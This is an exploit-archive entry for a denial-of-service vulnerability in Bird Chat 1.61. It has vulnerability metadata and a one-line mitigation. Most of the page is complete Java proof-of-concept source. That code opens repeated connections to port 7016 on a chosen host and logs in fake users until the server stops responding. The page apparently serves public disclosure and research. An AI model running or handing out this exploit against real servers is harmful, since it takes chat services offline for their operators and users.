Bird Chat 1.61 - Denial Of Service - Proof Of Concept

vendor:

Bird Chat

by:

Donato Ferrante

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Bird Chat

Affected Version From: 1.61

Affected Version To: 1.61

Patch Exists: YES

Related CWE: N/A

CPE: a:bird_chat:bird_chat:1.61

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Bird Chat 1.61 – Denial Of Service – Proof Of Concept

This proof of concept code exploits a denial of service vulnerability in Bird Chat 1.61. The code attempts to establish multiple connections to the target server, sending a fake user name with each connection. If the server is vulnerable, it will not respond to the connection and the connection will time out. If the server is not vulnerable, it will respond with a '?' character.

Mitigation:

Upgrade to the latest version of Bird Chat.

Source

Exploit-DB raw data:

/*
    Bird Chat 1.61 - Denial Of Service - Proof Of Concept
    Coded by: Donato Ferrante
*/



import java.net.Socket;
import java.net.InetAddress;
import java.net.ConnectException;
import java.net.SocketTimeoutException;
import java.io.OutputStream;
import java.io.InputStream;







public class BirdChat161_DoS_poc {



private final static int MAX_CONNECTION = 16;
private final static int PORT = 7016;
private final static String VERSION = "0.1.0";



public static void main(String [] args){



  System.out.println(
                     "\n\nBird Chat 1.61 - Denial Of Service - Proof Of Concept\n" +
                     "Version: " + VERSION + "\n\n"                 +
                     "coded by: Donato Ferrante\n"                  +
                     "e-mail:   fdonato@autistici.org\n"            +
                     "web:      www.autistici.org/fdonato\;n\n"
                    );


    String host = "localhost";

        try{

            if(args.length != 1)
                usage();

                host = args[0];

        }catch(Exception e){usage();}
    
        try{


            int i = 1,
                var = 0;


           while(i++ <= MAX_CONNECTION){

            try{

               String err = "";
               int port = PORT;
               InetAddress addr = InetAddress.getByName(host);
               Socket socket = new Socket(addr, port);
               socket.setSoTimeout(3000);



               InputStream stream = socket.getInputStream();

                  int line = stream.read();
                   while(line != -1){

                       if(line == '?'){
                           break;
                       }

                       line = stream.read();

                   }


               OutputStream outStream = socket.getOutputStream();
               outStream.write(("*user=fake_user0" + ++var + "\n").getBytes());


                int count = 0;
               line = stream.read();
                    while(true){

                       line = stream.read();

                        if(line == '\n')
                           count++;

                       if(count >= 3)
                           break;
               }


            }catch(SocketTimeoutException ste){break;}
            catch(ConnectException ce){System.err.println(ce); continue;}
        }


        }catch(Exception e){System.err.println(e);}

        System.out.println("\nBird Chat - Denial Of Service - Proof_Of_Concept terminated.\n\n");
    }







    private static void usage(){

        System.out.println("Usage: java BirdChat161_DoS_poc <host>\n\n");    
        System.exit(-1);
    }
}


// milw0rm.com [2004-08-26]